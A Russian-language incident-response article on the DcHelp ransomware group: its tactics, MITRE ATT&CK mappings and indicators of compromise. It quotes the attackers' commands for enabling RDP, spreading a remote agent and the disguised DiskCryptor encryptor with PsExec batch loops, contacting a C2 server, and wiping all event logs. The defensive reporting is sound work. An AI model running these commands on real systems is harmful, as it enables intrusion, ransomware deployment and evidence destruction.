Разбирая очередной инцидент, связанный с атакой шифровальщика, и услышав в очередной раз вопрос «как же так, ведь у нас есть антивирус!?», мы решили поделиться с комьюнити информацией о возобновившейся активности группировки DсHelp.
В этой статье расскажем про участившиеся атаки DсHelp, рассмотрим тактики и техники данной группы, а также отметим, почему антивирус — не панацея и как легитимное ПО может быть использовано против вас.
Злоумышленники все чаще стали использовать в своих атаках абсолютно легитимные инструменты, в том числе инструменты для шифрования данных, которые не вызывают подозрений у антивирусного ПО. Разберем одну из таких групп, активность которой возросла в конце 2024 года.
Профайл DcHelp
DсHelp (Enigma Wolf) — группа злоумышленников, атакующая организации различных отраслей и использующая для шифрования данных компьютеров и серверов программное обеспечение с открытым исходным кодом DiskCryptor.
При успешной атаке на инфраструктуру злоумышленники связываются с пострадавшими посредством e-mail, Telegram или иным способом и требуют приобрести пароль, чтобы вернуть доступ к данным. Сумма выкупа варьируется от $1 000 до $100 000. Оплату берут в Bitcoin, но возможно использование и другой криптовалюты.
На момент публикации активен сайт https://dchelp.org/, на котором можно ознакомиться с FAQ и даже оставить обратную связь:
Группировка DcHelp активна как минимум с конца 2022 года, недавние инциденты с ее участием зафиксированы и расследованы командой Jet CSIRT во втором полугодии 2024 года.
Как атакует DcHelp
Начало атаки
Для получения первоначального доступа к инфраструктуре своих жертв DcHelp в основном ориентируется на «низковисящие фрукты» и эксплуатирует уязвимости публично доступных сервисов, проводит атаки подбора паролей, а также использует легитимные аутентификационные данные, купленные у брокеров первоначального доступа или обнаруженные в утечках.
Получив доступ на узел, злоумышленники первым делом проводят разведку и изучают окружение — например, информацию о пользователе, группах, контроллерах домена:
whoami
net user <redacted> /domain
net localgroup /domain
netdom query dc
net group «Администраторы домена» /domain
В случае если доступ к системе был получен с непривилегированной учетной записью, злоумышленники повышают привилегии и проводят поиск учетных данных в системе. Для этого они используют следующие инструменты:
Mimikatz;
PWVIEWER (Password Viewer);
PWDCRACKU (Password Cracker);
ARestore (Account Restore).
Также злоумышленники ищут информацию о паролях в доступных для чтения файлах и в каталогах, используя встроенные в операционные системы механизмы поиска, а также ищут сохраненные пароли в браузерах и электронной почте.
Для сбора дополнительной информации об инфраструктуре злоумышленники используют:
Advanced IP Scanner;
Advanced Port Scanner;
команды PowerShell.
Пример команды PowerShell:
Get-ADComputer -Filter * -Properties * | Sort ipv4* | FT Name, ipv4, oper, LastLogonDate -Autosize
Собранная информация зачастую сохраняется прямо на скомпрометированных системах во временный каталог C:\tmp\:
host.txt\hosts.txt
computers.txt\AdComputers.txt
Закрепление, распространение
После получения информации об инфраструктуре в своих атаках злоумышленники активно используют батники для распространения и запуска ВПО. Например, один из скриптов изменяет параметры реестра ОС Windows, разрешая удаленные подключения по RDP:
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0 /f
netsh advfirewall firewall set rule group="Remote Desktop" new enable=yes
netsh advfirewall firewall add rule name="Open Port 3389" dir=in action=allow protocol=TCP localport=3389
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v "UserAuthentication" /t REG_DWORD /d 0 /f
reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v TSEnabled /t REG_DWORD /d 1 /f
Для закрепления в инфраструктуре злоумышленники используют MeshAgent, который компилируется с указанием собственного С2-сервера:
C:\tmp\mesh.exe (также могут использоваться имена — meshagent32.exe, meshagent-[domain].exe и др.)
MeshAgent получает инструкции по подключению из файла .msh, в формате "ключ=значение". Этот файл не всегда можно обнаружить на скомпрометированных системах, при этом можно извлечь интересующие нас строки из исполняемого файла MeshAgent:
MeshServer=wss://techsupport.myftp.org:443/agent.ashx
Данный С2-сервер оставался неизменным в нескольких атаках.
Распространение ВПО в инфраструктуре производится с использованием утилиты robocopy:
for /f "delims=" %%i in (host.txt) do (
start robocopy %systemdrive%\tmp\tmp \\%%i\C$\tmp /R:0
ping 127.0.0.1 -n 1
)
Установка и запуск ВПО производится с использованием PsExec:
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\mesh.exe -fullinstall
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s sc start "mesh agent"
ping 127.0.0.1 -n 1
)
for /f "delims=" %%i in (host.txt) do (
start psexec.exe -accepteula \\%%i -s C:\tmp\Notepad.bat
start psexec.exe -accepteula \\%%i -s C:\tmp\notepad.exe /SP- /TASKS="" /NOICONS /VERYSILENT /RESTART /SUPPRESSMSGBOXES /NOCANCEL
ping 127.0.0.1 -n 1
)
В качестве средств шифрования используется ПО с открытым исходным кодом DiskCryptor, при этом хэш исполняемого файла может отличаться от инцидента к инциденту, поскольку конкретный экземпляр может быть скомпилирован непосредственно перед атакой. Злоумышленники маскируют данное ПО под другие легитимные программы, например Notepad.exe.
Интересно, что при наличии в инфраструктуре (и возможности компрометации) сервера Kaspersky Security Center злоумышленники предпочитают использовать его функционал для запуска задач по распространению и установке ВПО на конечных узлах:
Распространение MeshAgent через скомпрометированный KSC:
Event 7045, A service was installed in the system.
Service: KL Deployment Wrapper
User: \System
Path: C:\Windows\TEMP\KAVREM~1\C19BB5~4\setup.exe /s /z/p\"TASK_ID=c12xx345-f67x-8910-11x1-21xbz31z4151\"
StartType: Автоматически
Cmdline: C:\Windows\Temp\KAVREM~1\C123BB4~5\exec\m.exe
Impact
После всех подготовительных действий злоумышленники производят шифрование инфраструктуры путем исполнения аналогичных батников, запускающих шифрование на каждом узле из списка в файле host.txt.
Пароль для шифрования создается алгоритмом, описанным в батнике, при этом используется функция генерации случайных чисел, а длина пароля составляет 13 символов (латинские буквы и цифры). Шифрование происходит криптостойкими алгоритмами (AES-256, Twofish, Serpent). Сгенерированные пароли для шифрования копируются злоумышленниками и удаляются после завершения процесса шифрования.
Далее могут затираться следы пребывания на узле путем очистки журналов ОС:
cmd - for /F tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"
Возможно ли восстановление?
В ходе расследования инцидентов среди удаленных файлов нам удалось восстановить несколько паролей, что позволило расшифровать часть серверов.
Если с момента инцидента система не перезагружалась, есть шансы извлечь пароли из оперативной памяти. При этом мы не рекомендуем полагаться на везение, а применять лучшие практики по созданию бэкапов. Принцип «3-2-1» никто не отменял, но в рамках расследований мы редко видим эталонное соблюдение данного принципа. И, конечно же, не стоит хранить бэкапы в единственном экземпляре на том же устройстве или в том же сетевом сегменте.
Lessons learned
В современных атаках злоумышленники часто используют абсолютно легитимные инструменты с точки зрения СЗИ для снижения вероятности обнаружения их активности.
Так, используемая связка DiskCryptor, MeshAgent, PsExec не будет вызывать подозрений у установленного антивируса, разве что возможен детект с формулировкой вроде *not-a-virus*. Кроме того, такая атака может быть реализована с использованием других легитимных инструментов: например, шифровальщик ShrinkLocker использует встроенный в Windows Bitlocker.
Расследование инцидента должно заканчиваться этапом «lessons learned», в ходе которого отмечаются те факторы, которые привели к инциденту, разрабатываются меры по недопущению подобных инцидентов в будущем. Конечно, рекомендации будут сильно зависеть от конкретной организации и произошедшего инцидента, используемых технологий и возможностей.
В качестве общих рекомендаций выделим следующие:
стоит начать с Attack Surface Management и посмотреть на свою инфраструктуру глазами злоумышленников, после чего убрать все «низковисящие фрукты»: установить недостающие обновления и убрать «лишние» активы с внешнего периметра;
одна из наиболее эффективных мер повышения уровня защищенности — доступ в инфраструктуру из внешних сетей с использованием VPN с двухфакторной аутентификацией.
обеспечьте резервное копирование критичных систем, причем при реализации системы резервного копирования и восстановления придерживайтесь правила «3-2-1» (хранить по меньшей мере три копии данных, из них две копии — на двух разных носителях, третья копия — на отчуждаемых носителях).
Приложения
MITRE ATT&CK:
Тактика | Техника | Описание |
Initial access | T1133 External Remote Services | Злоумышленники используют службы удаленного доступа с возможностью внешнего подключения для получения первоначального доступа к сети и (или) закрепления в ней |
Initial access | T1190 Exploit Public-Facing Application | Злоумышленники эксплуатируют уязвимости систем, доступных из сети Интернет. Например, популярные уязвимости MS Exchange — ProxyLogon, ProxyShell |
Initial access | T1078 Valid Accounts | Злоумышленники используют легитимные учетные данные для первоначального доступа, закрепления, повышения уровня привилегий или предотвращения обнаружения |
Execution | T1059 Command and Scripting Interpreter T1059. 001 PowerShell T1059. 003 CMD | Злоумышленники активно используют интерпретаторы командной строки и сценариев для выполнения команд или запуска сценариев и исполняемых файлов |
Persistence | T1136 Create Account T1136.002 Local Accounts T1136.002 Domain Accounts | Злоумышленники в ходе атак создают учетные записи для закрепления в инфраструктуре |
Persistence | T1078 Valid Accounts T1078.002 Domain Accounts | Злоумышленники используют скомпрометированные УЗ в ходе атаки |
Privilege Escalation | T1078 Valid Accounts T1078.002 Domain Accounts T1078.003 Local Accounts | Для повышения привилегий используют скомпрометированные легитимные доменные и локальные учетные записи
|
Defense Evasion | T1036.005 Masquerading | Злоумышленники маскируют используемое ВПО под другие легитимные программы |
Defense Evasion | T1562.001 Impair Defenses: Disable or Modify Tools | Злоумышленники отключают средства защиты, а также изменяют их настройки
|
Credential Access | T1003 OS Credential Dumping .001 LSASS Memory | Злоумышленники получают аутентификационные данные из памяти процесса LSASS. |
Credential Access | T1552 Unsecured Credentials .001 Credentials In Files | Злоумышленники ищут аутентификационные данные в доступных файлах на скомпрометированных узлах |
Credential Access | T1555.003 Credentials from Web Browsers | Злоумышленники проводят поиск сохраненных паролей в браузерах |
Credential Access | T1555.005 Password Managers | Злоумышленники проводят поиск сохраненных паролей в парольных менеджерах |
Discovery | T1046 Network Service Discovery | Злоумышленники проводят сканирование и поиск уязвимых ресурсов (Advanced IP Scanner, Advanced Port Scanner) |
Discovery | T1087.001 Account Discovery: Local Account | Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer |
Discovery | T1087.002 Account Discovery: Domain Account | Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer |
Discovery | T1069.001 Permission Groups Discovery: Local Groups | Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer |
Discovery | T1069.001 Permission Groups Discovery: Domain Groups | Злоумышленники собирают сведения о локальных и доменных группах, используя команды whoami , net user , net group , Get-ADComputer |
Discovery | T1083 File and Directory Discovery | Злоумышленники просматривают файлы и каталоги в скомпрометированных системах |
Discovery | T1217 Browser Information Discovery | Злоумышленники просматривают информацию, которая хранится в браузерах, чтобы узнать больше о скомпрометированных средах, а также для того, чтобы завладеть аутентификационными данными |
Lateral Movement | T1021 Remote Services T1021.001 RDP T1021.002 SMB T1021.004 SSH | Злоумышленники используют службы удаленного доступа и протоколы удаленного доступа для перемещения внутри инфраструктуры |
Lateral Movement | T1570 Lateral Tool Transfer | Злоумышленники передают инструменты или другие файлы между системами в скомпрометированных системах (например, SMB, RDP, PsExec) |
Command and Control | T1219 Remote Access Software | Злоумышленники используют стороннее ПО для обеспечения удаленного доступа и установления интерактивного канала управления и контроля в целевых системах |
Impact | T1529 System Shutdown/Reboot | Злоумышленники могут выключать/перезагружать системы, чтобы ограничить доступ к этим системам, снизить шансы на восстановление паролей и перезатереть данные в оперативной памяти |
Impact | T1486 Data Encrypted for Impact | Злоумышленники шифруют данные с целью получения выкупа |
IoCs, сетевые индикаторы компрометации:
№ п/п | IP-адрес | Страна | ASN | Дополнительная информация |
1. | 159.100.22.162 | DE | AS 44066 | С2-сервер techsupport.myftp[.]org |
IoCs, файловые индикаторы компрометации:
№ п/п | Наименование файла | Хэш | Информация |
1. | RDPRemoteEnabler_Free.exe | MD5: f4193a842a3f9ca03f687c7515e330ac SHA-1: 229b429820f63b9aa83cb1fd9a29c5c8d0410dd2 SHA-256: 9efa419cc3bb00ebb0f101685ff86b09a78ea230415ad09e7044e90fb357d6b2 | Изменение параметров Windows для разрешения подключений по RDP |
2. | advanced_port_scanner_2.5.3869.exe | MD5: 6a58b52b184715583cda792b56a0a1ed SHA-1: 3477a173e2c1005a81d042802ab0f22cc12a4d55 SHA-256: d0c1662ce239e4d288048c0e3324ec52962f6ddda77da0cb7af9c1d9c2f1e2eb | Сетевой сканер |
3. | clear.bat | MD5: 9b6becd8aeb8a42e70a6200a40600100 SHA-1: 4470d0f7d52eb130816cced2638f1b3300ee70c4 SHA-256: b33fd3420bffa92cadbe90497b3036b5816f2157100bf1d9a3b6c946108148bf | Скрипт для очистки журналов ОС |
4. | mesh.exe | SHA1: 39F9CAA77483E26337F598E04F8C6166 | MeshAgent |
5. | meshagent32.exe | SHA1: b4a5f9f3af3cef951259675128cf56808832d91a | MeshAgent |
6. | notepad.exe | MD5: def004f1ed671f0627970ecbf241371e SHA-1: 98f4e14d9378ff50ab882ad37263465fa0cf8d31 SHA-256: 018d0b2af8479147def984a4c6a0db31703baacd87557d51271ad8c952f450b8 | DiskCryptor |
7. | universaltermsrvpatch-x64.exe | MD5: 0546abe6293ba40348e1734fafca47ec SHA-1: 37c0d892b38bbf9d8c6a8d35db5b32555cb758c8 SHA-256: 5161cdafd0c6d79616d775f79214b2e7e3ad13de71db63e9fa6bfc448ba4084b | ПО для изменения параметров Windows, разрешения мультисессий RDP |
8. | ARestore.exe | MD5 7f86b67ac003eda9d2929c9317025013 SHA-1 343051cc1b3f33201d076478ea9badc796951423 SHA-256 fcea81909388611359bbaf41871300075e192a3246b9e1bebc5f3f0aaa2b2c9a | hacktool.bruteforce/msil |